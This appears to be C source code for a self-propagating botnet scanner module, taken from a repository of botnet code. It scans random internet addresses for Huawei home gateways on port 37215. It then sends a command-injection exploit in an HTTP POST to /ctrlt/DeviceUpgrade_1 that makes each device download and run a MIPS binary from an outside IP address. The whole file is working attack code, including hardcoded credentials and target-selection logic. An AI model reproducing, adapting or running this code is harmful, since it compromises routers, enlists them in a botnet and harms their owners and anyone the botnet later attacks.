Path: blob/master/Botnets/Self Reps/HuaWei/huawei.c
5038 views
#define _GNU_SOURCE12#ifdef DEBUG3#include <stdio.h>4#endif5#include <unistd.h>6#include <stdlib.h>7#include <sys/socket.h>8#include <arpa/inet.h>9#include <sys/select.h>10#include <sys/types.h>11#include <time.h>12#include <fcntl.h>13#include <signal.h>14#include <errno.h>15#include <string.h>16#include <linux/ip.h>17#include <linux/tcp.h>1819#include "headers/includes.h"20#include "headers/huawei.h"21#include "headers/table.h"22#include "headers/rand.h"23#include "headers/util.h"2425int huawei_scanner_pid = 0, huawei_rsck = 0, huawei_rsck_out = 0;26char huawei_scanner_rawpkt[sizeof(struct iphdr) + sizeof(struct tcphdr)] = {0};27struct huawei_scanner_connection *conn_table;28uint32_t huawei_fake_time = 0;2930int huawei_recv_strip_null(int sock, void *buf, int len, int flags)31{32int ret = recv(sock, buf, len, flags);3334if(ret > 0)35{36int i = 0;3738for(i = 0; i < ret; i++)39{40if(((char *)buf)[i] == 0x00)41{42((char *)buf)[i] = 'A';43}44}45}4647return ret;48}4950void huawei_init(void)51{52int i = 0;53uint16_t source_port;54struct iphdr *iph;55struct tcphdr *tcph;5657// Let parent continue on main thread58huawei_scanner_pid = fork();59if(huawei_scanner_pid > 0 || huawei_scanner_pid == -1)60return;6162LOCAL_ADDR = util_local_addr();6364rand_init();65huawei_fake_time = time(NULL);66conn_table = calloc(HUAWEI_SCANNER_MAX_CONNS, sizeof(struct huawei_scanner_connection));67for(i = 0; i < HUAWEI_SCANNER_MAX_CONNS; i++)68{69conn_table[i].state = HUAWEI_SC_CLOSED;70conn_table[i].fd = -1;71}7273// Set up raw socket scanning and payload74if((huawei_rsck = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)75{76exit(0);77}78fcntl(huawei_rsck, F_SETFL, O_NONBLOCK | fcntl(huawei_rsck, F_GETFL, 0));79i = 1;80if(setsockopt(huawei_rsck, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)) != 0)81{82close(huawei_rsck);83exit(0);84}8586do87{88source_port = rand_next() & 0xffff;89}90while(ntohs(source_port) < 1024);9192iph = (struct iphdr *)huawei_scanner_rawpkt;93tcph = (struct tcphdr *)(iph + 1);9495// Set up IPv4 header96iph->ihl = 5;97iph->version = 4;98iph->tot_len = htons(sizeof(struct iphdr) + sizeof(struct tcphdr));99iph->id = rand_next();100iph->ttl = 64;101iph->protocol = IPPROTO_TCP;102103// Set up TCP header104tcph->dest = htons(37215);105tcph->source = source_port;106tcph->doff = 5;107tcph->window = rand_next() & 0xffff;108tcph->syn = TRUE;109110#ifdef DEBUG111printf("[huawei] scanner process initiated. starting scanner\n");112#endif113114// Main logic loop115while(TRUE)116{117fd_set fdset_rd, fdset_wr;118struct huawei_scanner_connection *conn;119struct timeval tim;120int last_avail_conn, last_spew, mfd_rd = 0, mfd_wr = 0, nfds;121122// Spew out SYN to try and get a response123if(huawei_fake_time != last_spew)124{125last_spew = huawei_fake_time;126127for(i = 0; i < HUAWEI_SCANNER_RAW_PPS; i++)128{129struct sockaddr_in paddr = {0};130struct iphdr *iph = (struct iphdr *)huawei_scanner_rawpkt;131struct tcphdr *tcph = (struct tcphdr *)(iph + 1);132133iph->id = rand_next();134iph->saddr = LOCAL_ADDR;135iph->daddr = get_random_ip();136iph->check = 0;137iph->check = checksum_generic((uint16_t *)iph, sizeof(struct iphdr));138139tcph->dest = htons(37215);140tcph->seq = iph->daddr;141tcph->check = 0;142tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof(struct tcphdr)), sizeof(struct tcphdr));143144paddr.sin_family = AF_INET;145paddr.sin_addr.s_addr = iph->daddr;146paddr.sin_port = tcph->dest;147148sendto(huawei_rsck, huawei_scanner_rawpkt, sizeof(huawei_scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof(paddr));149}150}151152// Read packets from raw socket to get SYN+ACKs153last_avail_conn = 0;154while(TRUE)155{156int n = 0;157char dgram[1514];158struct iphdr *iph = (struct iphdr *)dgram;159struct tcphdr *tcph = (struct tcphdr *)(iph + 1);160struct huawei_scanner_connection *conn;161162errno = 0;163n = recvfrom(huawei_rsck, dgram, sizeof(dgram), MSG_NOSIGNAL, NULL, NULL);164if(n <= 0 || errno == EAGAIN || errno == EWOULDBLOCK)165break;166167if(n < sizeof(struct iphdr) + sizeof(struct tcphdr))168continue;169if(iph->daddr != LOCAL_ADDR)170continue;171if(iph->protocol != IPPROTO_TCP)172continue;173if(tcph->source != htons(37215))174continue;175if(tcph->dest != source_port)176continue;177if(!tcph->syn)178continue;179if(!tcph->ack)180continue;181if(tcph->rst)182continue;183if(tcph->fin)184continue;185if(htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)186continue;187188conn = NULL;189for(n = last_avail_conn; n < HUAWEI_SCANNER_MAX_CONNS; n++)190{191if(conn_table[n].state == HUAWEI_SC_CLOSED)192{193conn = &conn_table[n];194last_avail_conn = n;195break;196}197}198199// If there were no slots, then no point reading any more200if(conn == NULL)201break;202203conn->dst_addr = iph->saddr;204conn->dst_port = tcph->source;205huawei_setup_connection(conn);206}207208FD_ZERO(&fdset_rd);209FD_ZERO(&fdset_wr);210211for(i = 0; i < HUAWEI_SCANNER_MAX_CONNS; i++)212{213int timeout = 5;214215conn = &conn_table[i];216//timeout = (conn->state > HUAWEI_SC_CONNECTING ? 30 : 5);217218if(conn->state != HUAWEI_SC_CLOSED && (huawei_fake_time - conn->last_recv) > timeout)219{220close(conn->fd);221conn->fd = -1;222conn->state = HUAWEI_SC_CLOSED;223util_zero(conn->rdbuf, sizeof(conn->rdbuf));224225continue;226}227228if(conn->state == HUAWEI_SC_CONNECTING || conn->state == HUAWEI_SC_EXPLOIT_STAGE2 || conn->state == HUAWEI_SC_EXPLOIT_STAGE3)229{230FD_SET(conn->fd, &fdset_wr);231if(conn->fd > mfd_wr)232mfd_wr = conn->fd;233}234else if(conn->state != HUAWEI_SC_CLOSED)235{236FD_SET(conn->fd, &fdset_rd);237if(conn->fd > mfd_rd)238mfd_rd = conn->fd;239}240}241242tim.tv_usec = 0;243tim.tv_sec = 1;244nfds = select(1 + (mfd_wr > mfd_rd ? mfd_wr : mfd_rd), &fdset_rd, &fdset_wr, NULL, &tim);245huawei_fake_time = time(NULL);246247for(i = 0; i < HUAWEI_SCANNER_MAX_CONNS; i++)248{249conn = &conn_table[i];250251if(conn->fd == -1)252continue;253254if(FD_ISSET(conn->fd, &fdset_wr))255{256int err = 0, ret = 0;257socklen_t err_len = sizeof(err);258259ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);260if(err == 0 && ret == 0)261{262if(conn->state == HUAWEI_SC_EXPLOIT_STAGE2)263{264#ifdef DEBUG265printf("[huawei] FD%d exploit_stage=2. sending POST /ctrlt/DeviceUpgrade_1 to %d.%d.%d.%d\n", conn->fd, conn->dst_addr & 0xff, (conn->dst_addr >> 8) & 0xff, (conn->dst_addr >> 16) & 0xff, (conn->dst_addr >> 24) & 0xff);266#endif267util_strcpy(conn->payload_buf, "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nContent-Length: 430\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g 103.67.36.189 -l /tmp/.oxy -r /bins/oxy.mips; /bin/busybox chmod 777 * /tmp/.oxy; /tmp/.oxy)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>\r\n\r\n");268send(conn->fd, conn->payload_buf, util_strlen(conn->payload_buf), MSG_NOSIGNAL);269util_zero(conn->payload_buf, sizeof(conn->payload_buf));270util_zero(conn->rdbuf, sizeof(conn->rdbuf));271272conn->state = HUAWEI_SC_EXPLOIT_STAGE3;273274continue;275}276else if(conn->state == HUAWEI_SC_EXPLOIT_STAGE3)277{278#ifdef DEBUG279printf("[huawei] FD%d exploit_stage=3. closing connection\n", conn->fd);280#endif281close(conn->fd);282conn->fd = -1;283conn->state = HUAWEI_SC_CLOSED;284285continue;286}287else288{289#ifdef DEBUG290printf("[huawei] FD%d exploit_stage=1. connection to %d.%d.%d.%d successful. proceeding to stage 2\n", conn->fd, conn->dst_addr & 0xff, (conn->dst_addr >> 8) & 0xff, (conn->dst_addr >> 16) & 0xff, (conn->dst_addr >> 24) & 0xff);291#endif292conn->state = HUAWEI_SC_EXPLOIT_STAGE2;293}294}295else296{297close(conn->fd);298conn->fd = -1;299conn->state = HUAWEI_SC_CLOSED;300301continue;302}303}304305if(FD_ISSET(conn->fd, &fdset_rd))306{307while(TRUE)308{309int ret = 0;310311if(conn->state == HUAWEI_SC_CLOSED)312break;313314if(conn->rdbuf_pos == HUAWEI_SCANNER_RDBUF_SIZE)315{316memmove(conn->rdbuf, conn->rdbuf + HUAWEI_SCANNER_HACK_DRAIN, HUAWEI_SCANNER_RDBUF_SIZE - HUAWEI_SCANNER_HACK_DRAIN);317conn->rdbuf_pos -= HUAWEI_SCANNER_HACK_DRAIN;318}319320errno = 0;321ret = huawei_recv_strip_null(conn->fd, conn->rdbuf + conn->rdbuf_pos, HUAWEI_SCANNER_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);322if(ret == 0)323{324errno = ECONNRESET;325ret = -1;326}327if(ret == -1)328{329if(errno != EAGAIN && errno != EWOULDBLOCK)330{331if(conn->state == HUAWEI_SC_EXPLOIT_STAGE2)332{333close(conn->fd);334huawei_setup_connection(conn);335continue;336}337338close(conn->fd);339conn->fd = -1;340conn->state = HUAWEI_SC_CLOSED;341util_zero(conn->rdbuf, sizeof(conn->rdbuf));342}343break;344}345346conn->rdbuf_pos += ret;347conn->last_recv = huawei_fake_time;348349int len = util_strlen(conn->rdbuf);350conn->rdbuf[len] = 0;351}352}353}354}355}356357void huawei_kill(void)358{359kill(huawei_scanner_pid, 9);360}361362static void huawei_setup_connection(struct huawei_scanner_connection *conn)363{364struct sockaddr_in addr = {0};365366if(conn->fd != -1)367close(conn->fd);368369if((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)370{371return;372}373374conn->rdbuf_pos = 0;375util_zero(conn->rdbuf, sizeof(conn->rdbuf));376377fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));378379addr.sin_family = AF_INET;380addr.sin_addr.s_addr = conn->dst_addr;381addr.sin_port = conn->dst_port;382383conn->last_recv = huawei_fake_time;384385if(conn->state == HUAWEI_SC_EXPLOIT_STAGE2 || conn->state == HUAWEI_SC_EXPLOIT_STAGE3)386{387}388else389{390conn->state = HUAWEI_SC_CONNECTING;391}392393connect(conn->fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in));394}395396static ipv4_t get_random_ip(void)397{398uint32_t tmp;399uint8_t o1 = 0, o2 = 0, o3 = 0, o4 = 0;400401do402{403tmp = rand_next();404405srand(time(NULL));406o1 = tmp & 0xff;407o2 = (tmp >> 8) & 0xff;408o3 = (tmp >> 16) & 0xff;409o4 = (tmp >> 24) & 0xff;410}411while(o1 == 127 || // 127.0.0.0/8 - Loopback412(o1 == 0) || // 0.0.0.0/8 - Invalid address space413(o1 == 3) || // 3.0.0.0/8 - General Electric Company414(o1 == 15 || o1 == 16) || // 15.0.0.0/7 - Hewlett-Packard Company415(o1 == 56) || // 56.0.0.0/8 - US Postal Service416(o1 == 10) || // 10.0.0.0/8 - Internal network417(o1 == 192 && o2 == 168) || // 192.168.0.0/16 - Internal network418(o1 == 172 && o2 >= 16 && o2 < 32) || // 172.16.0.0/14 - Internal network419(o1 == 100 && o2 >= 64 && o2 < 127) || // 100.64.0.0/10 - IANA NAT reserved420(o1 == 169 && o2 > 254) || // 169.254.0.0/16 - IANA NAT reserved421(o1 == 198 && o2 >= 18 && o2 < 20) || // 198.18.0.0/15 - IANA Special use422(o1 >= 224) || // 224.*.*.*+ - Multicast423(o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense424);425426int randnum = rand() % 2;427if (randnum == 0)428{429return INET_ADDR(156,o2,o3,o4);430}431if (randnum == 1)432{433return INET_ADDR(197,o2,o3,o4);434}435if (randnum == 2)436{437return INET_ADDR(o1,o2,o3,o4);438}439}440441442